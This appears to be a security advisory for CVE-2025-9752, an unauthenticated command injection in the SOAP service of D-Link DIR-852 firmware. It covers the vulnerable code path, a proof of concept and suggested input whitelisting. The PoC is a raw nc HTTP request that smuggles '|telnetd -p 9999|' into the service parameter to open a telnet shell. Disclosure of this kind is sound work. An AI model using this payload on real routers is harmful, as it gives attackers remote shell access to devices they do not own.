D-Link DIR-852 1.00CNB09 devices soapcgi_main Command Injection #18
Description
D-Link DIR-852 1.00CNB09 devices soapcgi_main Command Injection
CVE-2025-9752
Vendor:D-Link
Product:DIR-852
Version:1.00 CNB09
Type:Command Injection
Author:iC0rner
Vulnerability description
A critical command injection vulnerability exists in the SOAP service of the firmware for the D-Link DIR-852. The vulnerability allows an unauthenticated, remote attacker to execute arbitrary system commands by sending a specially crafted network packet.
Analysis
In the soapcgi_main function of the htodcs/cgibin binary, when a POST request is made to the target SOAP service, the content following ?service= in the request URI is used to construct a system command. This user-supplied input is directly concatenated into a command string format (at address byte_437CE0), which is then executed. Due to a lack of sanitization, this leads to a command injection vulnerability.
PoC
The payload |telnetd -p 9999| is injected into the service parameter in the URI, causing the device to start a telnet daemon on port 9999.
nc 192.168.0.1 49152
POST /soap.cgi?service=|telnetd -p 9999| HTTP/1.1
Host: 192.168.0.1:49152
Accept-Encoding: identity
Content-Length: 16
SOAPAction: "whatever-serviceType#whatever-action"
Content-Type: text/xml
whatever content...
nc 192.168.0.1 9999
Suggested repair
Input validation and filtering:
Strictly validate and filter user input data to ensure it conforms to the expected format.
Whitelist Approach:
A whitelist should be used to define the set of valid services to prevent malicious user input. When processing the service content, the application should check if the value exactly matches an item in the whitelist. If the input does not match any whitelist entry, the request should be rejected immediately instead of being parsed or concatenated.